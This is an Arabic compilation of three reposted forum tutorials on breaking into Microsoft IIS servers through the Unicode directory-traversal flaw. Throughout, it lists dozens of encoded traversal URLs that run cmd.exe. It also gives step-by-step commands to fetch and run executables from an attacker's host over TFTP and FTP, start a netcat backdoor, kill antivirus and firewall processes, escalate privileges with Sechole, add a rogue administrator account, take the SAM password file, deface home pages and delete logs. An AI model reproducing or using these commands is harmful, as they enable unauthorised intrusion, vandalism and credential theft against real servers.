لايوجد تاريخ محدد لظهور اول ثغرة لليونيكود لذا يعتبر ظهورها بواسطة شخص مجهول anonymous person ، وقيل ان اول ظهور لثغرات اليونيكود كانت بواسطة الصينين ولكن لايوجد مايثبت صحة هذا الكلام لهذه الثغرات ، فتم استغلال هذه الثغرات من قبل المخترقين وتطوير البرامج اللازمة لها .


- كيفية ايجاد هذه الثغرات .
يتم ايجاد هذه الثغرات بطريقتين :-
1- بواسطة البرامج اللازمة والمخصصة لكشف هذه الثغرات سواء بالبرامج التي تعمل على نظام ويندوز او بطريقة الشل والتي تعمل على نظام لينكس .
2- بواسطة تطبيق الثغرة على الموقع مباشرة .


- كيف يتم استغلال ثغرات اليونكود .
عند تطبيق الثغرة على نظام الـ IIS4 / IIS5 يبدا ملف CMDبفك شفرة اليونكود في المثال الخطاء ومن هنا يتم استغلالها .


- الاوامر المستخدمة بواسطة ملف CMD .
الاوامر المستخدمه بواسطة ملف الـCMD وهي امر لانشاء دليل جديد وامر لالغاء دليل وامر النسخ وامر النقل وامر الحذف وامر تغيير اسماء الملفات وامر لرؤية محتويات الملف وامر الكتابة داخل أي ملف وامر لسحب أي ملف ، وهي حسب الامثلة التالية :-
امر انشاء دليل جديد: http://www.xxxx.com/msadc/..%c0%af.....e?/c+md+c:\hEx

امر الغاء دليل: http://www.xxxx.com/msadc/..%c0%af.....e?/c+rd+c:\hEx
للمعلومية:لايمكن الغاء أي دليل الا اذا كان فارغاً تمام من الملفات والمجلدات

الامر المستخدم للنسخ:
http://www.xxxx.com/msadc/..%c0%af.....cripts\hEx.exe

الامر المستخدم للنقل:
http://www.xxxx.com/msadc/..%c0%af.....ts\hEx.exe+c:\

الامر المستخدم للحذف: http://www.xxxx.com/msadc/..%c0%af.....del+c:\hEx.mdb

الامر المستخدم لتغيير مسمى الملفات: http://www.xxxx.com/msadc/..%c0%af.....ex.htm+hEx.htm

الامر المستخدم لرؤية محتويات الملف: http://www.xxxx.com/msadc/..%c0%af.....ype+c:\hEx.txt

الامر المستخدم للكتابة داخل أي ملف:
http://www.xxxx.com/msadc/..%c0%af../winnt/system32/cmd.exe?/c+echo+sNiper_hEx+>c:\hEx.txt

الامر المستخدم لعملية سحب أي ملف:
عليك القيام اولاً بنسخ الملف المراد سحبه الى أي دليل وبعدها يتم كتابة اسم الملف في اخر العنوان كالتالي:
http://www.xxxx.com/msadc/hEx.mdb


- طريقة تطبيق هذه الثغرات .
تطبيق الثغرة على الموقع من خلال المتصفح تتم حسب الامثلة التالية :-
http://www.xxxx.com/scripts/..%c1%1c...exe?/c+dir+c:\
http://www.xxxx.com/scripts/..%c0%9v...exe?/c+dir+c:\
http://www.xxxx.com/scripts/..%c0%af...exe?/c+dir+c:\
http://www.xxxx.com/scripts/..%c0%qf...exe?/c+dir+c:\
http://www.xxxx.com/scripts/..%c1%8s...exe?/c+dir+c:\
http://www.xxxx.com/scripts/..%c1%9c...exe?/c+dir+c:\
http://www.xxxx.com/scripts/..%c1%pc...cmd.exe?/c+dir +c:\
وقد نحتاج الى تغيير مسمى الدليل بحيث يكون :-
Msadc , _vti_bin , iisadmpwd , _vit_admin , scripts , samples , cgi-bin


- كيفية اختصار ثغرة اليونيكود حتى تتمكن من تفعيل امر الـ ECHO .
في حالة اكتشاف موقع يعاني من مشكلة اليونيكود ولنفترض انه كان على هذه الثغرة :-
http://www.xxxx.com/msadc/..%c0%af.....exe?/c+dir+c:\

فنحتاج الى نسخ ملف w3svc.exe الى مجلد inetpub\scripts والامر يكون بهذه الطريقة :-
http://www.xxxx.com/msadc/..%c0%af.....ipts\w3svc.exe

بعد نسخ ملف w3svc.exe الى مجلد inetpub\scripts ، الان نقوم بتصفح الموقع من خلال الثغرة بهذه الطريقة :-
http://www.xxxx.com/scripts/w3svc.exe?/c+dir+c:\
الان نستطيع الكتابة داخل أي ملف وبالتحديد الملف الرئيسي للموقع الذي غالبا مايكون في هذا الدليل
inetpub\wwwroot\index.htm بحيث يكون الامر بالشكل التالي :-
http://www.xxxx.com/scripts/w3svc.exe?/[email protected]+>+c :\inetpub\wwwroot\index.htm


- طريقة نسخ ملف الـCMD لاتاحة امكانية الكتابة على الملفات .
الغرض من نسخ ملف الـCMD وهو لاعطاء امكانية للكتابة داخل السيرفر في بعض الحالات ويتم نسخه الى مجلد السيكربت بهذه الطريقة :-
http://www.xxxx.com/msadc/..%c0%af.....ripts\cmd1.exe
الان بامكاننا استخدام ملف الـCMD الجديد في الثغرة بدلا من الاول بهذا الشكل :-
http://www.xxxx.com/msadc/..%c0%af......exe?c+dir+c:\


- كيفية معرفة مشكلة الـ Access Denied والحلول المتبعة لها .
تتم معرفة مشكلة الـAccess Denied من خلال المحاولة في حذف أي ملف من أي امتداد ، فعند ظهور رسالة الـ Access Denied فاليك هذه الطرق حتى تتمكن من الكتابة على الملفات والتحكم اكثر على السيرفر :-
1- الطريقة الاولى نسخ ملف الـ CMD الى دليل السيكربت بمسمى CMD1 فسوف يتاح لك امكانية الكتابة باستخدام الامر Copy باستخدام هذا الامر :-
http://www.xxxx.com/msadc/..%c0%af.....ripts\cmd1.exe
2- الطريقة الثانية بالتعامل مع الملف ssinc.dll والطريقة كما يلي :-
o اولا انشاء صفحة باسم test.shtml
o تكون هذه الصفحة داخل مجلد wwwroot/hEx/test.shtml
o كتابة هذا الكود داخل الصفحة <!--#include file="AAAA[...]AA"--> بحيث ان حرف A يتم كتابتة حتى يتعدى 2049 حرف .
o الان يتم طلب الصفحة من خلال المتصفح http://www.xxxx.com/test.shtml
o الان سوف تظهر لك الصفحة .
o الان تستطيع الكتابه وتم تخطي مشكلة الـAccess Denied .
o اذا ظهرت لك صفحة الخطاء رقم 500 فمعناها انك لم تقم بتطبيق الطريقة بالشكل الصحيح وعليك اعادة المحاولة .
3- الطريقة الثالثة باستخدام برنامج NC.exe بحيث يتم عمل اب لوود لهذا الملف داخل مجلد الـTemp في دليل الويندوز ومنه يتم تنفيذ الاوامر من خلال موجة الدوز وللمعلومية مجلد الـTemp مفتوح لعمليات الاب لوود .
4- الطريقة الرابعة وهي من خلال عمل كراش للسيرفر باستخدام البرامج اللازمة لهذا الغرض وهذه الطريقة غير مجديه في كثير من الاحيان .
5- البحث عن ملفات : root.exe ، sensepost.exe ، shell.exe ، w3svc.exe ونسخها الى مجلد c:\inetpub\scripts وتطبيق الثغرة من خلالها .


- كيفية عمل اكاونت للدخول بواسطة الـFTP .
1- نسخ ملف CMD الى مجلد Scripts باسم Shell.exe حتى يتم الاستفادة من ثغرة قديمة
/c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\script s\shell.exe
2- انشاء ملف mspft.pll بواسطة الامر Echo وكتابة فيه التالي open ftp.host.com حيث ان هذا هو الخادم للـFTP .
/c+echo+open+ftp.host.com+>+c:\winnt\mspft.ppl
3- الان مطلوب اضافة مجهول Anonymous الى نفس الملف الذي قمنا بانشاءه mspft.pll
/shell.exe?/c+echo+anonymous+>>+c:\winnt\mspft.ppl
4- الان مطلوب ادراج البريد [email protected] الى نفس الملف الذي قمنا بانشاءه mspft.pll
/shell.exe?/[email protected]+>>+c:\winnt\mspft.ppl
5- إضافة User قبل Anonymous لزوم الملف الذي قمنا بانشاءه mspft.pll
/shell.exe?/c+echo+user+anonymous+>>+c:\winnt\mspft.ppl
6- الان تكرار لحاجة الاعداد
/shell.exe?/[email protected]+>>+c:\winnt\mspft.ppl
7- يتم هنا ادراج الموقع الحالي للملفات
/shell.exe?/c+echo+lcd+c:\inetpub\wwwroot+>>+c:\winnt\mspft.pp l
8- الان يكتب اوامر الـFTP اللازمة لسحب الملف من خادم الـFTP وهي Get index.htm ثم يدرج هنا بدون المسج السابق
/shell.exe?/c+echo+get+index.html+>>+c:\winnt\mspft.ppl
9- هنا نفس السابق ولكن باضافة Quit
/shell.exe?/c+echo+quit+>>+c:\winnt\mspft.ppl
10- الان يتم تنفيذ امر FTP.exe?+"-s:c:winnt\mspft.ppl” وهو عبارة عن خطوات قمنا بانشاءها وموجودة في ملف mspft.ppl باحتوائها على مايلي :-
- Open FTP.host.com
- Anonymous
- [email protected]
- User Anonymous
- [email protected]
- Get index.html
- Quit

/msadc/..%c0%af../..%c0%af../winnt/system32/ftp.exe?+"-s:c:\winnt\mspft.ppl"

- طريقة كشف باسورد الادمينستريتور .
نحتاج الى وجود برنامجين ( Microsoft Access – L0phtCrack ) وهي لزوم تنفيذ بعض الخطوات لتالية وهي :-
- باسورد الادمينستيتور للسيرفر يكون موجود في ملف الـ SAM._ في دليل \winnt\repair\ وافضل برنامج لفك شفرة الباسورد هو برنامج L0phtCrack

- اذا كان هناك مستخدمين في السيرفر ويوجد لديهم حساب فان معلوماتهم سوف تكون في ملف PASSFILT.DLL ونستطيع تحديد مسار هذا الملف من خلال الريجستري بواسطة هذا المفتاح :-
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contro l\Lsa\SYSTEM32\PASSFILT.DLL

- اذا كان السيرفر يعتمد في القراءة باستخدام صفحات الـ ASP للوصول الى البيانات من خلال قاعدة الـ MySQL فسوف نحتاج الى تطبيق ثغرة ( +.htr ) للوصول الى باسورد المسئول عن هذة القاعده وهي كالتالي :-
http://www.xxxx.com/default.asp+.htr

عند ظهور صفحة الخطا في الوصول الى الصفحة المطلوبة وبالتحديد في سيكربت التنفيذ فالطريقة صحيحة وماعلينا فقط سوى سحب ملف database.inc وقراءة محتوياته للعثور على اسم المستخدم والباسورد للمسئول عن قاعدة البيانات .

- تغيير الصفحة الرئيسية للموقع وعملية الاب لوود بواسطة برنامج TFTP .
1- قم بانشاء صفحة وضع شعارك عليها واحفظها باسم index.htm على الـ c:\
2- قم بتشغيل برنامج TFTP ونفذ الامر في الفقرة التالية .

/c+tftp.exe+"-i"+1.1.1.1+GET+index.htm+C:\inetpub\wwwroot\index. htm


- مسح ملفات اللوق حتى لا يتم التعرف عليك .
وتتم هذه العملية من خلال حذف ملفات الـ Log من مجلد System32 بواسطة الامر :-
/c+del+c:/winnt/system32/logfiles/*.log

انتهى ،،،



" الإختراق عن طريق اليونيكود (الجزء الثاني) "

<منقول من منتديات شبكة الحزم الإسلامية>


في الدرس الأول كان عبارة عن اوامر اساسية يستطيع الجميع تطبيقها .. اما في هذا الدرس فالأمر يتطلب بعض الذكاء والمهارة ..


البداية :
--------------

عند وجود موقع مصاب بثغرة ما (يونيكود) فان اول شي عليك القيام به هو نسخ مجلد cmd الى cmd1 بهذه الطريقة :
C+copy+c:\winnt\system32+
c:\winnt\system32\cmd1.exe والسبب هو تفعيل امر الكتابة Echo ..
وبعد ذلك نفذ الثغرة من الملف الجديد CMD1.exe ( هذا شي يعرفه الجميع ) لكن للتذكير فقط !

الان عند تصفحك لملفات الموقع من المتصفح .. من خلال هذه الثغرة فانه سيكون لديك صلاحيات IWAM_USER وهذا المستخدم هو عبارة عن يوزر ينتمي للمجموعه Guest وهو اليوزر المسؤوول عن تشغيل سيرفر IIS .
وبما انه من مجموعة Guest فهو لا يملك صلاحيات كثيرة !! الا اذا تم اعداده بشكل سيء

لايوجد شي اكثر ادمانا من محاولة الحصول على رووت هذا في انظمة *nix اما في Microsot فالوضع مختلف فإن محاولة الحصول على صلاحيات Administrator ليس بالسهولة التي تتوقعها فرفع الامتيازات بشكل محلي في انظمة مايكروسوفت ممكن فقط بطرق قليلة لا يتعدى عددها اصابع اليد الواحده .. وانا اكتب هذا الموضوع لاشرح كيفية احكام السيطرة على السيرفر والحصول على حساب مكافيء للمدير والتمتع بجميع موارد النظام ..

+ الملفات المطلوبة :
Sechole.exe وملحقاتها .
Kill.exe
Tlist.exe
ncx99.exe
tftpd32.exe

جهز العده ..
لتوفير الوقت جمعتها في مجلد واحد هنا
الان سأشرح عمل كل اداة :

1 - Sechole وهو اقوى استثمار موجود لرفع الامتيازات بشكل محلي .. وطريقة عمله (بشكل مبسط) بأنه يعتمد على صدع في نواة ويندوز ان تي .. يستطيع من خلاله اغتصاب عملية تابعه لمدير النظام يقوم من خلالها برفع امتيازاتك .

2 - Tlist تقوم بعرض جميع العمليات التي تعمل بالخلفيه .. والفائده منها هو اقفال الفايروول + الانتي فايروس
3- Kill.exe عملها متمم للاداة السابقة حيث ستقوم باقفال رقم العملية المستخرج من الاداة السابقة .
3- NCX99 نسخه مطورة من الباكدوور NC ينصت على المنفذ 99
4- TFTP32.exe لنقل الملفات الى السيرفر ..



كل ما سبق كان عبارة عن مقدمه اما العمل الحقيقي سيبدأ الان :



اولا قم برفع جميع الادوات السابق الى السيرفر ..
ثم قم بتشغيل ncx99.exe بهذا الشكل مثلا :
http://target/scripts/..&Agrave;¯../...c+C:\ncx99.exe
بعد ذلك قم بالاتصال بالموقع على البورت 99 ..
ستحصل على سطر اوامر CMD بدون امتيازات = Guest .
الان قم بتشغيل الاداة TLIST .. ستعرض لك جميع العمليات التي تعمل .. قم بالبحث عن رقم العملية PID الخاص بالانتي فايروس ان وجد .. وكذلك اذا وجدت جدار ناري ..
سجل رقم PID الخاص بالانتي فايروس والفايروول على ورقه جانبيه ..
الان قم بقتل الاجراء بالاداة Kill بهذا الشكل : KILL.exe PID .. مكان PID تضع رقم العملية
يسأل البعض ! مالهدف من اقفال الانتي فايروس ؟ الاجابة .. أن التحديثات الاخيرة من انتي فايروس تتعامل مع Sechole على انه باكدور .. والان بعد اتمام العمليات السابقة بنجاح .. قم بتشغيل Sechole.exe من المتصفح .


عندها سيتم رفم امتيازات IWAM_USER الى مجموعه Administrators ..
الان بإمكانك تنفيذه جميع الاوامر بكامل الحريه وبدون اي مشاكل في الصلاحيات Access Denided .
وطبعا اهم شي الكتابة على الصفحه الرئيسية بامر الايكو :
C+Echo+Hacked+by+XDeMoNX+
> +C;\inetpub\wwwroot\index
.htm

ولكن ليس هذا كل شي ..
القراصنه الاذكياء لا يبحثون فقط عن تغيير الصفحه الرئيسية خصوصا اذا كان الموقع مهم او يحتوي على
معلومات او قواعد بيانات ... إلخ

سؤال : هل تستطيع الدخول بهذا اليوزر ؟ IWAM_USER الى اي خدمه مثل تلنت او اف تي بي ؟؟
الاجابة : لا .. صحيح اننا قمنا برفع امتيزاته لكننا لا نملك كلمه المرور ! لانه تكون مسنده بشكل عشوائي .
سيذهب تفكير البعض الى الحصول على ملف السام وكسره هذا ممكن .. لكن يوجد ماهو اسهل .
بما اننا لدينا حساب مكافي لـ Administrator ولكننا لا نملك كلمة المرور . ما رأيك بإضافه يوزر جديد باسمك مع باسورد خاصه بك مع امتيازات المدير ايضا !! قليل من الذكاء والتفكير
قم بانشاء مستند نصي جديد واضف السطر التالي :
net user Demon pass /add && net localgroup administrators Demon /add والان Save as واحفظها باسم add.bat .
توضيح : ما فعلناه سابقا هو انشاء مجلد دفعاتي يقوم بانشاء يوزر جديد Demon وكلمة مرور Pass واضافته الى مجموعة الادمنستريتورز المدراء ..
قم الان برفع الملف add.bat ثم تشغيلها من المتصفح (بواسطة اليونكود)
الان لديك حساب مدير وتستطيع الدخول الى اي خدمه .. اف تي بي او تلنت او نت بيوس او غيرها
لا تنسى في النهاية مسح الاثار واضافة الابواب الخلية الخاصة بك لتسهيل الدخول في المرات القادمه
طبعا لن اتوسع في هذا الجانب لانه ( لكل شيخ طريقة!) وكل واحد له اسلوب في اخفاء ادواته والتحكم في الملفات .

نرجع لنقطة سابقة ..
هل تذكر اني طلبت منك اقفال الفايروول ؟؟ لماذا ؟
لو جربت تنفذ الامر netstat -an من خلال سطر اوامر الان سي .. فانك ستجد من المنافذ ما يسر القلب
90% من السيرفرات اللي دخلتها وكانت محمية بجدران نار وجدت المنفذ 139 فيها مفتوحا بدون حمايه
لذا فان اقفال الفايرول قد يجعل لك اكثر من خيار لاسقاط الهدف

اسف على النحو الاملاء .. والتنسيق الـ أي كلام واختصار المعلومات ايضا .

بالامكان الاستعراض اكثر من ذلك بكثير .. الى درجة الحصول على تحكم رسومي GUI .



لكن لم يكون لدي الوقت الكافي .. اذا وجدت وقت فراغ فسأكتب عن طرق اخرى وادوات اخرى مثل GEtAdmin و Sechole2 وكيفية الحصول على تحكم رسومي بواسطه الاداة WINvnc ..

انتهى،،،


" معلومات عامة عن كيفية الاستفادة من ثغرات اليونيكود "

<منقول>
<الكاتب: بلاك هنتر>
الموضوع يتكلم عن اساليب التحكم في السيرفر عبر اليونيكود مع بعض المتطلبات
الادوات المطلوبه :

1) اداة مسح ثغرات يونيكود
2) برنامج سيرفر TFTPD
3) معرفة جيده باليونيكود
=================================================
=================================================
1) بأمكانك الحصول على ثغرات اليونيكود من العديد من المواقع او من موقعي
http://www.devil2k.com/
وهذه مهداه مني انا (( بلاك هنتر ))
/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/MSADC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/MSADC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
/MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/MSADC/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25% 35%63../winnt/system32/cmd.exe?/c+dir+c:\
/PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
/PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
/Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
/Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25% 35%63../winnt/system32/cmd.exe?/c+dir+c:\
/samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\
/_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system32/cmd.exe\?/c+dir+c:\
/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\


2) بأمكانك الحصول على برنامج TFTPD من الموقع
http://iisbughelp.4t.com/


3) معرفة اليونيكود بسيطه جدا يكفي ان تعرف كيف تستطيع الانتقال عبر الهارديسكات وعبر الملفات
(تعمل عبر المتصفح )

/[scripts]/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+C:\
لقرائه ما بداخل هارديسك \:C
/[scripts]/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+D:\
لقرائه ما بداخل هارديسك \:D
/[scripts]/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+E:\
لقرائه ما بداخل هارديسك \:E


نقوم بعمل سكان على الموقع لنرى ما به من ثغرات وهنا مثال على ثغرات مبتدأه بالمجلد المطلوب (( اغلب ثغرات اليونيكود تنطلق من هذه المجلدات ))

1)مثال المجلد msadc
/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+C:\
2) مثال المجلد _vti_bin
/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+C:\
في سيرفرات IIS عند تركيبها (( بشكل عادي )) يكون المجلد الرئيسي للويب تحت اسم معين وهو :
C:\Inetpub\wwwroot
او في المجلد
D:\Inetpub\wwwroot
او في المجلد
E:\Inetpub\wwwroot
في العاده يكون في الهارديسك C ولذلك سأكمل شرحي على انه هناك
ستجد في هذا المجلد عادة جميع المواقع التي على السيرفر

فلو وجدنا ثغرة يونيكود ما ولتكن
/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
وأردنا الولوج الى هذا الملف لنرى ما به فسنكتب الثغره هكذا :
/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+C:\Inetpub\wwwroot

اذا كان السيرفر يحوي عدة مواقع فستجدها كل موقع باسمه ( ستجدها في مجلدات بداخل مجلد الـ wwwroot ) اما لو كان السيرفر عباره
عن موقع واحد فقط فستجد كافة الملفات في مجلد الـ wwwroot نفسه
في اغلب الظن يقوم الهاكر بتغيير الصفحة الرئيسيه الاولى وعليك ان تعلم انه ليس دائما الصفحة الرئيسيه الاولى تحمل اسم index.htm
هناك عدة تسميات وأختصارات لها وهذه بعضها (( معظمها ))
index.htm
index.asp
default.htm
default.asp
main.htm
main.asp

لنفرض الان اننا وجدنا ان الصفحة الرئيسيه للموقع في مجلدنا wwwroot هي index.htm فكيف سنقوم بتغييرها وهو ما يهمنا تقريبا من عملية
الاختراق هذه

سنقوم اولا بتغيير اسم الملف من index.htm الى اي اسم اخر يخطر ببالك وليكن ss.htm
طبعا سنرسل الامر عبر ثغرة اليونيكود من المتصفح لديك وسنقوم بتغيير الداله c+dir الى الداله c+ren
(( عليك ان تعرف ان الاوامر التي سوتضع هي نفس الاوامر الموجوده في Dos وفي Command Prompt فعليك ان تكون عارفا بما هو الامر المراد استخدامه
المهم ستكتب الثغره هكذا :
/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+ren+C:\Inetpub\wwwroot\index.htm+ss.htm

وهكذا فقد تم تغيير اسم الصفحة من index.htm الى ss.htm
ارأيتم كم هو سهل ؟
Aيبدو انك ايها المخترق لم تكتفي باغلاق الصفحة الرئيسيه للموقع فانت تريد ان تضع صفحة بموضوع اخر وليكن الموضوع هو
Hacked!!!
فكيف سنرسلها في صفحة index.htm ؟؟
هناك عدة طرق ومنها سأذكر هذه الطريقه وهي عبر الاتصال بمنفذ TFTP الذي ستكون فيه انت في وضع السيرفر والموقع الذي امامك
في وضع الكلاينت

كيف سيتم هذا ؟

اولا قم بتركيب نظام سيرفر TFTP على جهازك ( البرنامج المذكور في اول الموضوع من افضل البرامج وهناك برنامج اخر اكثر احترافا ولكن هذا يكفي )
الان ضع السيرفر الرئيسي في \:C لديك
قم بتصميم صفحة خفيفه وسريعه وسمها index.htm وضعها في \:C

الان نريد ان نرسل للسيرفر الملف الجديد من \:C لدينا الى ملف
C:\inetpub\wwwroot
لا ليس الامر صعبا ففي نظم ميكروسوفت يوجد امر (( هو بالأصح برنامجا منفصلا )) يحمل اسم TFTP وهو عباره عن كلاينت بسيط يستخدم
بروتوكول TFTP وهو بروتوكول بسيط جدا جدا (( يسميه البعض البروتوكول التافه )) يقوم بسحب او ارسال الملفات من والى الجهاز
نحن نريد ان يسحب ملفا من جهازنا فكيف لنا ذلك ؟
طبعا لو كنا في غير اليونيكود لكتبنا توليفة الامر التالي :
tftp.exe -i XXX.XXX.XXX.XXX get index.htm C:\inetpub\wwwroot\index.htm
(( XXX.XXX.XXX.XXX تعني اي بي السيرفر المراد سحب الملف منه ))
في توليفة هذا الامر يقوم الكلاينت بطلب الملف المسمى index.htm ليضعه في جهازه في المجلد wwwroot
ولكن لا تنسى فشكل توليفة الاوامر يختلف من الوضع العادي عن وضع اليونيكود
فما هو الحل ؟
الحل هو ان تحول توليفة الامر الى يونيكود لتضعه في الثغره التي لديك
بعد تحويل الامر الى يونيكود سيصبح شكله كالتالي :
tftp.exe+"-i"+XXX.XXX.XXX.XXX+GET+index.htm+C:\Inetpub\wwwroo t\index.htm
ياللروعه لقد تجاوزنا العقبه بالفعل

الان قم بتشغيل سيرفر الـ TFTP وقم بتجهيز ملف الـ index.htm
وقم بالاتصال مع الموقع عبر ثغرة اليونيكود المضاف اليها هذه التوليفه ليصبح في النهايه على هذا النحو :
/msadc/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+tftp.exe+"-i"+XXX.XXX.XXX.XXX+GET+index.htm+C:\Inetpub\wwwroo t\index.htm

وهكذا قمنا بتحميل الصفحة الى الانترنت وانتيهنا من عملية الاختراق (( تقريبا ))
ملحوظه : يمكنك ان تقوم بتحميل ملفات EXE ايضا وتشغيلها على السيرفر بنفس الاسلوب وهذا مثال :
لنفرض اننا نريد تحميل ملف EXE على السيرفر وسميناه hunter.exe ونريد تشغيله فكيف لنا ذلك ؟
سنتبع الاتي :
نقوم بتحميل الملف على السيرفر كما قمنا بتحميل index.htm ونضعه في \:C للسيرفر عبر هذه التوليفه :
/msadc/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+tftp.exe+"-i"+XXX.XXX.XXX.XXX+GET+hunter.exe+C:\hunter.exe

